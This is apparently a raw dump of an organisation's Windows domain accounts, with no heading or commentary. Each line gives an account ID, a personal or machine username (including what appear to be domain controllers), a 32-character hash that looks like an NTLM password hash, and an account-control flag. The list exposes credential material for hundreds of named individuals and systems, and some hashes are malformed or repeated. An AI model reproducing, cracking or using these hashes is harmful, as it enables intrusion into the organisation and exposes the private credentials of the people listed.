3206 mdanelke 58d267031108d7b9089fb94f236785c8 66080
3207 cblascyk 9c3b90b15f00f481b94aa164729a4d9b 66080
3208 tbengtson 5b91192b86e5e38304e03cc463c2688c 66080
3209 bkipp 2f2b9a59122f528ae9dab4919eef021a 66080
3210 jstock 04a4816d0d9c50ed5d81967e4472b2 66080
2069 ssnordby b87873f5c36e099a1dd70c2997ee7634 66082
3699 nchelliah 99d18a5640490c029a99461967318196 66080
3700 aathey 802b86f643c99aef0d2ffb945005e482 66080
3121 blee e5291f1449f66686a1def83daa759f66 66082
3706 belee 80b039cd64077f54d6a6c87b76e5cf5f 66080
3708 phaberer f9c143be0041861bb993f39f78df0952 66080
3709 jeandrews 47b29e7297e1a2c493882cb5d1acb5a6 66080
3717 cwarde b97536d0b9013d6c80f2e51d85a6a6ab1 66080
3718 mwendt 0c9dc5585aea4f3f673fad73bc01b5c2 66080
3726 sdenardo 7f77eaa05b49ccc5de2152719fa83158 66080
3728 amiller 7af9829b5e7a480432bbff19ba1a8293 66080
3707 tclemensen eebccdc0b2cb0f4f4e7312f577e3e823 66080
3746 khyttsten 7a21990fcd3d759941e45c490f143d5f 544
3749 jlolsen 7a21990fcd3d759941e45c490f143d5f 544
3714 bmoerke 274194e661d6b4a1f3f4b4395f2a8e11 66080
3705 jhotvedt bddfb254e68978d750fb3b11c88980c8 66080
3747 tschmidt 32ed87bdb5fdc5e9cba88547376818d4 544
3745 lguttormson cf773e1bcad4cfdcabbcc2a1773e8dfa 544
1569 lmshol abc4e928d4b6656cdc2f50d7db91658d 66080
1961 menosal 7bed3d262008d701ebdf6f192f4ecb85 512
3211 jzimmerman ab0361df3905918f506e1ef81a676068 66080
3732 enelson fdcb937082862fec68eb27cca0230cae 66080
3743 kquarzenski 368d1f874ec963f51c3f37bd7cb27728 66080
3217 jradermacher 8e25fca7fe670a1ef3f7d33565702c18 66080
3216 jspaeth 30b6725b7f206dfef38afd3b26cde482 66080
3737 rsticha e2d1252eb58c355cb52d4b94a5716122 66080
3731 dweigel 9df1fc4471da9920da645c1e1b0193a3 66080
3742 amanderson 6838329ad037fab10150f471aafa16bb 66080
3729 jbrand bbec3aa8fccb44beb9658bebd230812a 66080
3738 jandrews 7713e54d6149c19e6bf0b863d7a5829a 66080
3736 abalgaard e02141e877cdc6f0a76212d68b7d1185 66080
3741 lbeebout 751d0a42c7bc3e9728c27852fb7574b7 66080
3730 pdale 082c854cedf9d48adefdc6ad9e5e30dd 66080
3733 tdudley 73c7d1001e98494ff50090e420968de9 66080
3734 sfeierabend 0c20349b27b0d1e70091e812ea5d3e78 66080
3740 tkay aa0cbfff234b8868e3d0e8ecaed1fb49 66080
3215 mkunstle 869344f72de1ad848b5981dcb99d19cd 66080
3739 tlindley c13ecf11cdc215c8060aee2dc9daa7b3 66080
2039 mtorres 789c1048398e3c875f62415cbedafc63 544
3194 tstrates 01f6a51f5ea0f3fa147081938fe17abb 66080
3724 jlohse f4f6de46d8493fe763742c4ddcada732 66080
1839 bjonken 1455893cf488171aac6bdf8f38806f02 66048
3662 bbagheri 85d1b9ed688976d60bca02746a0ea24d 66082
3716 hdavids 2f192067980a1fa183a4edbcf7f88109 66080
3720 aseger 050324abfdd09e698f545ef1d7669076 66080
3751 pjdilly 1a8d34d359c633b9d2b54b20c908dcad 66080
1810 marqmlpt 82532f6826ab4683746e6c899f1d2c26 512
1957 cldahle 1b269f78c8f3b1b38ed363de625b4be9 512
3686 aredding 8d7f15bf43c1aeb699020e2ab4f943a8 544
1928 nlbertram 4802cdb907b9b5e97a4dbb4892b80c7b 66080
3748 bmoore 03096f8607f2f99d8e56d9b63965a2cd 544
3750 jmorris 9abbe5859bdea767528b3ee5e2ba3990 544
3704 cbenson 7561c8f4f9d6f6d9a68a1df57f12606c 66080
1167 r_vigecc 836198353f3bd28c37c6b3656af4d287 512
1519 kjandrews 72689568cd6b52990919f71401f9fbfb 512
3703 lhansen f9e37e83b83c47a93c2f09f66408631b 544
1161 a_evavcc 3227e9a3a0e50f03d995e50dbedc77e9 512
3685 bdehaven c242092bfeeb43b08e7225036b9f6795 544
3182 rschulz 017bc067b2691fa3c1186f14f5c544ba 544
3218 nverma 24f6e3c0b4d60f1fb157fbb057ff6478 66080
2045 smsampson 56d5c133f3ba2b2c8b59b87bce21d4ef0 66080
1827 kugllmbi 46eb00e79da62c3d913ac8cabd39633f 512
1755 pahlmebi 59f20522158f90a6507a5a68450bf8d8 512
3682 drbratlien 6af0a5199725de2dda9244426eb13dfd 66080
1811 symenapt 7c2775f5f46ca6772ff6feda5a15c39d 512
3191 jbheckman 34e66be24b6b3e3018ba4e8590e8ed76 66080
1286 karaaxell 0a3c4deb4606ffc73b0f3db36e73d007 512
3678 asoutor 84b5ce26e9c3c758b60b796381e11a0a 544
3673 cclark 45fd4325cf7526f08270d6d95ec745e3 544
3744 kimjohnson 7a21990fcd3d759941e45c490f143d5f 544
3219 kijohnson 4aea5ff9f308db07dbb3e10c8f59c1e3 544
2099 drjelinek 2881d5cf74fc982d10174434c69d37ca 66080
3221 msumner 0a36ea273622bb254eab03ad1d2f0675 66080
3225 mbussa 834a01e171c1511ad46f193792ac5d62 544
2016 llhexum e6de2a3a895e2f8442d9ef41dc06ba43 512
3212 crohloff ea0069dfe9ce92a05b99a3f64914dadc 66080
3702 ajensen 65071e8a9f6cd3d347566a45f246cdb1 66080
3224 kbuczak 58a478135a93ac3bf058a5ea0e8fdb71 544
3687 tnapp 7ded9cf2a15278db249f4dd0c5c5b2cd 66080
2082 dsquires d8d5d149c6286cedaec6e1cb293d375c 66080
1997 kgogbogu aa78fcafaaecbcdb90b208ac4b5faf94 544
3645 bjlaney 84801213b740b81e9ca60a646b1e0a3f 546
1215 dll 013140f7ceff192b451eaed83b7dbfe1 512
2010 rksundby 2f1bc14d3d54d550a2160ea8fc7f363f 66080
1880 ajfalck b309082b1f3269e0cdf56b71b97e6bd5 66080
1315 lolljdsn f9371be7906002d68a9e1c3da64f4ed2 512
1966 elpeterson c6b2f58f726188912e7e4cc95a787a0f 66080
2064 tleliason af61440f9a461322e1c2fc7b5e0c28de 544
3145 ahdominguez 8b14ef8a873276d96a2ac0567d2d6750 66080
3680 hnalbert c27545b18e0f7af45fea11a7d272b472 66080
3135 etberro 4a829a41aab63d94d2f7dd252eafdc90 66080
3147 jcjohnson 792508dbd7d9693b9e7ce078e9c43885 66080
3197 jhaley 6cff63abc2d1668b91019e120d418b87 66080
3764 cdnorris 5600599991d0b24ec550ca51e9ea53a5 66080
1964 djorandi 1df0d388ff98dab288ac33cfc9af3f17 66080
3170 kmsawyer 3b8a64c7b0261cd3d4273a71a04b8a3d 66080
3701 jbrevig 0d867ce7ee97500f4a18088077719be9 544
3770 jgmarshall c71cf281c08ba3a2580bf7892ed8a8fd 66080
3232 mlpaulson c26abdba943fc666da80387bbe304f6d 544
1886 drberger 98447d252cce6109736c24cb8c5b2c04 512
2078 hegewaldl 7a21990fcd3d759941e45c490f143d5f 546
3659 tharrison 988a8fe2ccb22a1484a20b1f962a2486 544
1668 adkamrfp f72e3a858debde72f50f85bee53c1a0a 512
3758 dnriley 3c42e6b35fd0a27bbda711eba4bd5fd7 66080
3684 kkaushik 04592e27471e3e1ff0fa3f383da6dcf4 66080
1217 drlipson 71b43a8306d1bb60e84a0bc2400a5a21 514
3235 lnygard 7a21990fcd3d759941e45c490f143d5f 544
1875 jlthunselle e4c329e69525291304a7d2807c89477b 66080
3233 acfiala ea65fb049f698ca1a2a5d94fd13cfb0b 544
1565 lwwaite bd5c7f1e2e11b4c5993670cde347bf4b 512
1641 pslinder 9348c3642f47ada17dcfdc1d7d8eca88 512
3762 hwilson c923157653b773887144e4cb634e53bd 544
3205 cshipley 1d82cf8e1ad54e24787e12d42b23e4e6 66080
3236 crico c0aa220653ba235f1f0885bf5aeb6fd6 544
3776 LRH000955$ 2aa647c303f84b9487ca74d2aa4d1f83 4096
3761 svanerp d743f0e50d195a3b7f57445da256d44d 544
3237 jbauer eab4556003a83e179a149ce6583e097f 544
1445 saolson a3174064e5df297ceaebaf4682a611ef 512
2089 aesax de353cfaeec8601f83b2d658a0ac8561 66080
3780 Tanderson 1b66337b958db181272b0c28092321c5 544
3234 jlkraft 2590913f809b8930b7b7338e56228785 544
3617 sbhaugen 746a427b1b8edbfc6a0320258835cf37 66080
1626 m_dewexr af2d43ceaea484e7871bcb902756b2f9 514
1621 jebeithon 1b1135cb9431cff7b48447d86d0f39ad 66048
3240 jloh 0f564bb6b25912dc51eeb64a9bf30389 66080
3239 mleon b2dc81d287286332b163deb7d993be68 544
1571 Lkgrunew 3b4e6bbb125bb148ad8b0ede912eacf6 66080
1325 cbstigen 5654690ff05f50725ceec956aff0368b 512
3230 kdresow 0e342dc5277c074d71a64e61ae82819a 544
1946 tmdewey 9806ad49e12ad478ac5c3c47b4775a7bad9 66080
3231 mlromslo 9af11b0af4f5c499b1585f7006d3f0af 544
3241 efevavold c721e2a5c9fad69f68d1d9f7233d0a09 66080
3242 dmgrothe 68d158ffe0ae5e8c03893cdcfcdc9183 66080
1707 brunsmfp 2f891514a09b310c5e184bdf123dd635 512
3754 jgmitchell 8cd2209358a8e86b0c7b65e9863f7f38 544
3244 aarosenkrans e89898c83b3b04cc87cf2ba0f1befce9 66080
3245 tthagen 8a3fae86b263434cd7d27c58418823db 66080
3246 lljensen 24cc4a64ec9ea3b23166d44427b96c79 66080
3785 pmhabberstad 7a21990fcd3d759941e45c490f143d5f 544
1759 llpearso d6dc83575443fa81b7b8a484539eb29a 512
1893 mmbarnes cbd188dd7ea8598cefd6533896e6fbd7 512
1202 jea e86e945713819cac1d04720f51e1f7e4 512
1536 djlandmu e181f457342748c4cd09dad958e72b0e 512
3760 pmiller 50ae45132343dd3950795d4ba213912b 544
1710 bmpetemu 4a5d2e77270842ba4d43ab14bbc92ba3 514
3238 bemery b5f84ffe29fdd2ccd34a98a2af1041a5 544
3162 MRNWKS17$ 52f187408f397f3a73b6d514a1101fd0 4096
3777 mstayman 95087e883541e580da2d78a0340288c2 66080
1441 jeprice 0b8557714db41320768a6c8ff3ad8d0b 512
1934 ewolden 1b123eda9c30734c5349be5ab95e622b 512
1624 ldcharxr 10d51136ecae056bd31609d64c39cd91 512
3775 tsofficer db3dcdee7088c54347ecb9d337c6e6c7 544
1297 maryjotonneson 651de33d6cdf9231b43056ff7071601f 512
1180 ajfishsu 4e173f53ea685937facdaccc764bb322 512
3616 sibowman 883657c785794a6c66245708bc0a146c 66080
3782 Kmfinkelson f03cccbdab1380b0c3deebb5a2476f12 66080
3766 lnelson 9fa0ebbf5f3d64d488ee1462baa23e18 66080
3663 ljdingwall a44fbb7283ca381cbacd6d8fefd79424 66080
3176 prhtech db2e2e2db5de660a4e66952e7c340dea3b 66080
3252 ebecker a6564f0d4c7b3e8ec13889ede1d1b4fc 544
3253 sknaus 287d4519e3da6469a4f572378050f56e 544
3254 hwold adc85782b0a540f111f66b48fafaaecd 544
3697 lrapp 5aa11bbfbf48dabaac1b3f618a03af82 66080
3711 wlnyman d0e5676e1f18e67d6e9392ac5887ec2c 544
3778 rcampbell 0188aabf6df8847800e1755889a8fa0e 66080
2075 lkbarthel c9719528f8f9ebd659840786bfcec068 66080
1402 lrwhite 5e5fab4d07e0c0d0df0f6a42dba9fc27 512
2072 mspeterson dc87be1856ba6fd7ed533e27f2a40545 544
1650 welccrxr 78215d449c6f17482b541ea20cba4a93 512
3675 MRNWKS18$ 71a27e0b7f8fab8e51be242bbd34f5f0 4098
3789 grhtech c86c5af58d28542d1947fbcb901a8299 66080
1866 lastoll ef42a7d6774983241a2a55247b96b72 514
2604 kjkemmer 606aa7efd3d9d3c96af8b9219e595cd 66082
3175 lfabel 90153dd7c07d2e412e2670e22b958ee4 66082
1681 kanoyecc 60e698666b0a2b6941a72ac4aff6a4d9 512
3721 khokanson c0aa6268feedbfcc8b2ffef3f072dab 66080
1647 lkthomxr 7bac175452ce652677262dc8009e89d8 66050
3268 tlis 0c5e5cca01119988aded6eeb6d1e5867 66080
1206 drborowski bcae9cf983d6e62c61c18f6dee82a607 512
1905 ajmelberg 27faf911827510ef3f2017aa39f948e6 66048
3765 dpickrell 8fbb36341e774e2e491adbb461695f97 544
3278 dlesmeister 7a21990fcd3d759941e45c490f143d5f 544
2093 mnkowalski 572356a7e037ebd894226cc60900eeb9 66080
1188 pmrundsu 8e6771b224e703dbbd186bcc343c0239 66048
1703 lebuchmu acd35ec2b7ec25a37c8b935a3565b1e5 512
3634 bdlarson a573af9f9250995ceb4d2342e40bd895 66080
3112 MRNWKS13$ 53ba223a954a866b916b68a12738c12b 4096
1240 drmatter 966440c2b1a673166d488f3891a80efe 512
3698 jhoffman b4855825ae580cbd2015e734299642e2 544
3280 TEMP0$ 8252bbf03e3db69e1d872e2c1eb5ec17 4098
3710 bmbeckert a498616fd144dd0681a224d4690eee7c 66080
3122 hmshol 476d0ab3ac09690e864c11e05d371276 544
1165 t_martcc a44772032da791fadc285212cf1912c3 512
3273 spatel 072173c87f28720a583f890ae7559946 544
3274 jcorry 150873b40164b420d7117fe7d4309e62 544
3276 kesse 9b69e8d44bb99f05ffc210987b6edab3 544
3277 dgiannakidis 4468caf7a3f7440bc99a04bd34744e7b 544
1833 jehaarstad 4cbbc36ab7ee30cab782e16ea4270e45 66048
3784 cdcooper 48b214605ef262be9290e474f5271cc4 66080
2038 mccooper 982fccae904b0cf57fcabec3e9cdd0d1 66080
1929 baduenow 655e06636ca0e2682294c6b86d2d41f0 512
1654 n_aslaor d35cab41444ebfa7a8246385a09c82a8 512
1659 blmulvor 17b856dfc50b19e414968a6a2772e34e 512
1573 MRNWKS12$ ae39f114a0924f2b703e5628b5a1f226 4098
3266 lddivald 3de8505c35442ae80184a6c784a4e0cd 544
3787 bsmith 4472910b89492aef53ceb6b420b15f52 544
1835 b_glassu 67f5296cfe35af81a281822f5789cff2 512
3693 mwood 05355201b0e8036a0f80e48d4d4a454c 544
1321 anesmgr 606824736dd2645664eaf79fc31d1956 514
3796 bdfagerlie 6650c25cf1a1a7345926de9fceebdb58 66080
3797 kanikcevich e3a2323f39581fc51aee293e5e50c944 66080
3606 clboyer f92df27b803395ca73751f297872fae9 66080
1748 laandebi cc4e0355850bd035fa09905f53f28aed 512
1428 mdflugstad 73f003f0d842f1f55437bdecc14a3baa 66048
3800 rmassaquoi 5c6cee0597fea0b5a32fe545ed9d8f18 544
1323 tracybeckman 998330048814c2a6e1b121ad0700c1a1 512
3772 pfshol 99e02a0cfe154a568c2f335a1cf41391 544
1450 katlynbockman 5cb6367e176a3a44fd38aac5e1a51d 512
1721 dlmortfp 7e32de26ea37ea0868cee8e8f2632a71 66048
1705 pabaglmu f2cce80cf6e95ddfb8da2fa7c3cfc823 512
1300 mllohse 64f2940a7f7e98b39f40b1c5c769525d 66048
3793 cthiele 9f12a60fe10fce15ceb8ca440e7bda32 66080
1744 j_haasbi 3ae668e7cce8b8e300fe2e8b81ed7393 512
3791 latkinson 7a21990fcd3d759941e45c490f143d5f 544
3801 holson 7a21990fcd3d759941e45c490f143d5f 546
1655 orasst e3853b1f7355a76024e5978553b7e0d8 512
3179 Dcarndt c68dd631d5061b45779948d721716c24 66080
1808 whithrpt c709283b34de77173d0fafef50155632 512
3719 hdomek e0e50b795008b41856709a1d730aded3 66080
2052 tjkeller 775502b4d04a9f0d89d7d9fec9e67b33 66080
1223 mjn 1c0c10d5bc5ecd940fd491dcd67708 66048
3757 rrkester 33e61ce5f2e9cd59910e05b7c08be164 66080
1312 tmmark 01ee5ba08c4c30b61fba9d4cab74b38c 512
1618 mmalsgxr 32338b657b31149f135e177817d92d61 512
3798 tthacker da34b93958c0400f3f09d2ebc7f4cfcc 544
1697 mestuemu bbb4d417ad2061b15ba4b5f19a7bc840 512
1917 clcabrera 60a1eaac00fc84116560ede5db72c2a5 66080
1461 pjmarlot 8c8d459602830c8dc0a961b32a298a8a 66080
3803 haileyolson 51bda3bd385b2fe8e58927e2287f10 544
3629 abashir b5fa34e6c385bf96ca0028adf95128aa 66080
3795 mamunich 63919ea605bf5b36d96b7115af87a96d 66080
1448 drgupta cd16c8e938dd145c40ba9159c9cfb225 66048
3657 mmlee 2556b0a43ec0860d2547b285ac850d63 66080
3799 aemami f0b3802b0629cd85fd862caaeb9e119f 544
3190 klfuchs ad67ef3d1f01f2ce38cd606457e53dce 66080
3271 shanson c12db14a5dee7c993725969810cf5f48 544
3284 koltesa ed28d4db9d6d176ffcebd697d49c2538 544
3713 sanderson 2797fb2bef6849caad893f8ea30efcda 66080
1844 radefelice 06494501ef20b85f6517e1982511e4ac 66048
3722 notto 7fe981532394e2dc8c42c9cbc2a00568 544
3788 echexum 3fceb45f9810ef7ee61bb7aee4f87ff3 66080
1549 klbrummer ff6e02d7831f231a6c1c389d2b903fb1 66080
1807 almqklpt ed41f3390969fa51561c2e2679cdb065 66048
3727 sschmall ad23f058442413fa492a8b9c42722297 66080
1515 djpreston bd893dd5ccb9540c97f1b09f499bc524 512
1352 krheidpt 8d483b8055f2b79a9f83074e545c9321 66080
1754 alkuglmu 176b6ac8c9b3a80b10b9acb5f6420e6c 512
3285 lncunningham 1dea8a82847137ac244cad5157d9095e 66080
1619 kaarndxr 377871bc88640737991a91ee2fb63cb3 512
3792 rerickson b74f6805d5aec51aafccdb10e10d7dc0 66080
1434 sewilde 4164ae41a3d33fa45f88602f17b59e14 512
3283 lapointb 0cfa5bed8c8fbb3435bff603824ea9d 66080
1205 dtbjork 0c47178ff33cba3a38863ec09c60f00e 66048
3804 dlconzemius c2720f7eb4c0ae044b6f784882681d43 66080
3250 bmkraft a0e7c1995ea0d8de8b5936a8e2f4d9c4 544
1887 klkeller 80c8b29db94ed0b30dcd438dfae41a50 512
1466 dmanderson bcd95007ad292aa41e612fe16635cf7c 512
3620 tjmahoney 55c3fc77056307ad7c55f9001bb1be01 66080
1567 dsperr e2ce83b9895bab68023b3f8965d5e413 66080
3149 sacihak bb1ca804e39129284548b4144afa5efc 66080
1696 gelundmu 1f6a957330c98ec9247c1c73de1f1c39 512
3275 wgao 9fd1d13215e778089265d9c77811eaa0 544
2065 kkholland 62bcb945d2f22bd9296305df276fd120 66080
1923 taevavcr 1afbdc5b577af28262d9f9f97091edf5 66080
3774 aaengen 6a36260f41dbfdac767d0838f60ba28b 66080
1945 nolson 0f784ad40710074048e105d508d9c8d86 512
3763 bbartell 44837d1d8ddd2901d5ce7b01679406f2 544
3753 anhunstiger bd9834b1e396f7e5c0a3627abca2b79b 66080
3631 ajevavold ecc56abc4486fbce0cbca1ef10c0a2bf 544
2018 aapeters 78311337e0e3c18802aa4b529a73a4f5 66080
3223 agupta 7b9d0d8a3e343866f174cf100d437339 66080
1796 carrie 7731dfbe3c47eac2765a137982b2338d 512
3779 Sstallman 41ab808371fd0290177402d4b7083414 544
1870 lmrud 4f4a3dbd0923b926a7c5385c68826c5 512
1507 lknutson d8a73e5661f56ccedfe2c291cbf79ab2 512
1658 smlapoor dd90179a47a25d3ff2397d5435c22a19 512
2087 tlbolluyt cff458f1414179962d61696e8ba2fdba 544
3773 ewoodke cd96953d72f3de97cf6fe6f54bb92f9547 544
1216 drlindholm c075a7246f4c8bef9d38a2d3a133bc2f 512
2040 llsiems 8cfde151045c5f9397ac0e226dae041a 544
3195 jsbigelow c8795e154577c9fc3d9474f979332c62 544
1628 rlgragxr f5c80f2d74103e9fa4f159a42c5606e1 512
1413 drtate 01ee5ba08c4c30b61fba9d4cab74b38c 512
3180 rrboesl d5b053724212803becc83dfebc87cca3 66080
1693 kmbugbee f941649e8f47b442b849646d0e9fbda0 66048
3689 adgenereux 80124839fe1e372436e4c7a003ff0841 66080
1552 almanning 890e84ad97cb8d2d1a2196feb89e1aa1 66080
2061 lstage 646a44785b574f9eeb2d6dd39fbc8713 544
1731 d_barkrc f45aac15e69acd4d8f909c616e5792d0 512
1690 ardeutschlander 06ab83fa6bef64787596b2e7dbff7e0e 66048
3255 amandak 8f2e0effefe9ce900f0af39654efb42f 544
3118 scpolzin 090a334bee52ef0af8d15eed4e67860f0 544
1777 smhanson 2f2cc839a042f276010567334733f55b 512
1227 drsamson a1079f9d031a997fd2ce2f5475701de6 512
1171 tjloxtmu 9e74d3d34d49e6255cdf47423971de78 512
3143 mchristianson c549a587fc362d601d0a52492a4f9ad3 66080
1874 drglynn 606824736dd2645664eaf79fc31d1956 512
3243 wjstoll 463689d49c56b5cb9df07713ed9bf349 66080
3768 kmmartin 65a72bbe7eb27d0bdaddb1514bc17f27 66080
3621 jkpetrick 1fff5ccc480ed1c9af0d26f0370670f2 66080
2084 ambell c515d94ca7d4785b385f30b330f5ff26 66080
1299 missyhalvorson 4296577fbc12ebd93e998c7a636696a5 512
3681 cmschnurer adb4a2e8507a8c56d93600d145b6985a 544
1236 eaw 36f8dee2ff0c6e543fd59c047f67c8d2 512
1290 kimborgos 9b71edf13ad0572d0c45e39996c93691 512
3201 fbackman 244604ce957b7db25f7a26d29d782059 66080
3267 stbsmith 2f80cfd4647edf90c3b5c062e19cd953 544
1377 ctlarsen ca7e8ba4c5738e8919e047a67f91a688 512
1222 bem fbd5a20b0af06c7072f66d3e601f5df7 66048
1656 s_hoffor f6ac816feafe9a48d558c5c5c275163b 512
1817 klvillagomez cb07f6a4efd0161ec072c7043ec282af 66048
1620 gib 78cee4448b7f2c765c2e5773b04c9296 66048
3755 mbropes 7dc6c11be7bc7ffde538c61e937a3061 66080
3270 tjerickson c4c9bc11ccdc61ca0fa178335c89f11a 544
3756 ljhegewald 911b036eb67a3c3613aa586389b82df5 544
2043 orthompson 2f0b69177ccfca8ff22d99eb5ad33f7c 66080
1233 drvennerstrom 4fbed754b567cab978731a901070d06f 512
1250 drnoyes f45a632c42d72767bc0bd24cb3738619 512
3794 sjbroadway fec7f2e406f5fcdf259d41c68dd391ee 66080
3226 MRNWKS20$ 3c062810ba76be858c7168c102f017f4 4096
3644 NWKS15$ f4a49d5d5afe33be31b22bbf34c3ffcc16 4096
3279 keddy 4d633061f7446e627fab789452eb001a 66080
1508 amfries 46970abf77cbe0922b0fef23209f6c4b 512
3256 markg ab5058c6d7df4267b8810f2c687c94c5 544
3790 jrtotland 218143d40917d213ef5dd38998ee45e0 544
3123 ksmith f1c0c855344c74f985318e0593ceeafb 66080
1633 jajansxr e863cacd5e1c01a74b3b90fa62614df0 66048
3263 jessicao 062b97e0ef98fb82a9d8751fadf4040e 544
3282 talacey b81b54d6537f63abe40c0bbfe95d9a1a 66080
1520 kjnordick 7a32637f352e6251c468fbce69a16af3 66080
3171 kglanz c74f497e527592c592682cbf43c13907 544
1212 jhorak 6084ae91972fbeb924a2c906bf57c0ab 66048
1888 jcbengtson 71c261a2f43ffe580f929d63cc07f70c 512
3805 tddonahue e4b4f74a11c7849a43c41a1aaaa6d769 544
1502 NSTORE1$ a7ecca7ada2e5e7460be17cd3be17451 4096
2028 MRNSERV0$ 3b7dca99302839049a812e34ee396e30 4128
2027 MRNSERV1$ b6db88adfb0d3292eb81c07aa0be29b 4128
3649 MRNWKS16$ 616d340582257213f48c5a31dc4bbf4f 4096
2032 MRNWKS3$ d84dad55fa5b4e00bd76a763eb794a62 4096
3222 caaase e18ca25635a48c99e81622bed575a0dd 544
3281 dlholzer 35235e5d7c7f4fc6b4b9b20bd644ba7a 544
3132 sjreese 6f712741e060f625db4c79632f6ab668 66080
3647 eeverett d382a68cd4cadfb315e090f0e25fe8 544
1638 klosprxr 4a4113c6269fb6affdc7721171691bfe 512
1527 NWKS16$ 9f05b3181145e48180859495e362189c 4096
3802 lkatkinson f5370a2cb0c74941246b8f314595851b 544
3696 sberg db273ce36efee2d860acdc2a6562a3c0 66080
2044 kjkhaghany 721e94d3c6fb6495f987ae4e9974ed16 66080
3144 clschmidt b99e2e175c81d852b1ee7630c3afe489 544
3665 MRNWKS15$ b72d2ca3ccf02632ebcecc7d0ece2f69 4096
3247 akwalvatne 652fab17e41dd3879b9b9fee393e4d3b 66080
1378 paragon bee6ea7d7368285956f0158844283bb5 66080
2002 scschmid 6e40d6d997a5d7621a3c51f836c2c9f6 512
3184 tbuseth 1a60a6e3a4db305a9cbc8fc4522eed2d 66080
1725 krhammer 8b6ed8f3965da2296f924c4dc7cda017 512
3227 srmabanta 8e9568f4d0e46735f731adcbd02ff3b2 66080
1809 ewleopold b5a372118565ff272d600097181272d5 512
2070 kmochsendorf 65a13a298816a8804ad0e56f6d066052 66080
1370 lmbaez a2c4803d9e45db3c8fea23335f425a3d 66048
3692 pholmes 9361c8cfcbe72efc56fbfc38bfd3ac34 66080
3715 cosborne c5ffa688e2eaf45e3aaddc670d60e924 66080
3695 snordby 7b3690121840a53b82e38c9d84cccd3b 544
1978 sjaday 2aa8d3a2efecf9392bdad316ffe58204 66080
3287 ahmeda a786dde97ed0e8a0dc4b4101b89d0354 544
1985 aaltamirano 14633fe81d99ada0956694ccef9c77e7 66048
1623 boscjlxr 60715fe92ab15af8b5a6eb78908eba1e 512
1646 jmstyvxr 249dd04b3c41068af6c58b94c44aaf69 512
3786 alharnisch ee098fd8f7bd735743966c13570a0086 544
3251 mecker 8908a51e1f8985b7cb9420848c9f46d7 66080
2035 MRNWKS9$ 3c0b0db88bb2d8886cb25f5c68a71e16 4096
3668 LRHC$ 6da3553db64a74927e867700459ec640 2080
1506 jroberts 79828a3a4c96b7970e8211f140636f18 512
3286 herbaughb d827ee57145e0d8eceed6313358511fd 544
1784 sborsgard c18b6543a6eec71f44a94ec05474f792 66048
3258 lindsayw aa6c3883788ac2f71d00f3e5dbbfb35d 544
1629 kmhansxr d66e52a5f21e0d39eb4cef8c6bf05737 512
3213 kpiechowski c59c8922de63bc3c2136a52f4c1c6334 544
3610 wcporter f70d8147f106cee0fc67d4d2e0fc6ecd 66080
1609 klr d23713c8361026ad0a8f710ceeb1c6de 66048
3228 kigriffie 71eb4f33f5b68b91d34c1e56feb72cd9 66080
2034 MRNWKS6$ 4315e02ab31cbadb75deebf29aee3f4c 4096
1965 laspangler f2f30efb3bbe1993d17ddb853d4ad569 512
1644 lbheiden ea69b248b4fb74e5076c4e6085376236 66048
3767 mbsahin 6f18c8d46bee3e37db945fb3f6fb92f3 66080
2086 joanderson 5afdb1e681f188213cb5affb6c79df9d 66080
2030 MRNWKS7$ b96691c586b3657a952ef8ea1da74ac5 4096
2041 jdovergaard b47a066f40ccf1d76fd4000cfaa35d13 66080
3646 mtbenson 6d5b86313752d11db7997a34e12dc0f8 66080
1110 alibe a80fdb8db842a99d87ef3d857f8ddcf1 66048
1108 ali a80fdb842a99d87ef3d857f8ddcf1 66048
1642 drorandi 866b8826bfd5fff14c59775e5729bafc 66048
3152 cjedin c21f1b18aaac94f439332acb78ab4532 66080
2036 RADDC01$ ac668ff27865e411e6a3198940ed2b5f 532480
1572 MRNODE1$ 59a564e81ef6c0c37df0d60f8527a6eb 4096
1579 RADDC02$ cbdabc82ea9ee3d8d804ba2b9f89dd04 532480
2024 MRNSTORE0$ b928b07146e0445419dd1699b3cca5e0 4096
3725 abuehring 65be0db2b857963ad796e6e0d0def162 66080
2026 MRDB-CLUSTER$ 15e0f37b3609471f835ae577085e23a0 4128
3677 MRNWKS19$ e21efb05c6ce9ac89c2e7e30dcf49c62 4096
1698 apschrmu 2a6d0812775eb89f6f3077934bcf95f2 512
3183 elynnes a6ca874c62b05d592273dd708ef187d2 544
1797 drmouser b56354d9266cba25422ab15e8547bcf5 512
2102 LRH-DYNACAD$ 4743dfcacb4876815bf14b75f4acf9ae 4096
3269 mrlee b5b7af6574a6f394e855649382cda928 66080
3196 cplindgren dc316faba52608ac3f441c84727feab0 544
1862 rlkaczmarek f5f1b18257325ed5fe2e87d0aaf759e8 512
3260 briannav 107e0ca156a9c8cab7be287dcd41aaec 544
1631 slhighland 2da4bf65438772db6ceb5ff2d409e57d 512
1649 sathomas 8346863b35867cd414e4e3731ea2da4b 512
3114 chmiller a1f79ae5f9a44c0cba0b6c06bd1e1f5c 66080
3262 morganr 1d0b364bc66b6c951599e11c914e7e7d 544
1568 kolson 058405257249b0c11ec365f8a6370982 66048
2029 MRNWKS10$ f658d35e5cecd87b58e87fe7857b1b2f 4096
1453 skerr 323fcf8e029f3231fd4121a3826a20f3 512
3229 mhalsumrain 695d0eefdfabb555707356abede42eef 66080
3694 krogahn 52879cdd1a4b4923e67fd6f4e2cdfe53 66080
3214 thovde 5587afee05c46b510a50d9e466170d34 66080
3264 stephanieb f5aaeeb4c446730ca370dd949c7fb0c3 544
3781 Kmikkelson cece59201cfefd426aab5fb76db4e59c 544
3771 kjschulte ced6be295f37375e1213919fc8e36043 544
1630 kjhatlxr bf4c3092a586df1a9137a4f5737bdc94 512
3261 brandif dcdc950485cb74a73bf4bf80a4101dac 544
1524 alinds ffd6d72372040691add367549b688221 512
3259 ruthj 6759d99e6711980d074fecb45aff5b55 544
1639 j_larsxr 4f7c65775d8bda83d8216bb2091917cf 512
2047 caaffield 92961d60f619b6063bfd2765a679dc82 66080
1548 maolson 85b0a1c1f6f44a83cc75b62dde6f0eaa 512
3199 smartin 75e426efab18059cfa6684258f4a7d3a 66080
1449 atduenow d245b15328227ea8c8307d7aae721a73 512
1575 MRNWKS11$ 29e77d391aa2f097349593368b67cb18 4096
1636 mtkerrxr f902b05bebc3d13fa0187f84a44b0e1c 66048
3137 MRTEST0$ 28c309a1ac3eaa0801839a1e991561b1 4096
3752 mbhintz 207c08a4223d1b19c53eda8e717d5129 66080
1551 crott 5ce23e414589110e9fba3537ae619600 66080
1475 kbaumgartner b348e7647e07f39ef4d706ab455342e6 512
3249 mthovland 75770dd4f66f4ed318db64ad1ce80b0f 544
1550 jeolson 62ff1aee79dada73b838aec7ca3c560f 512
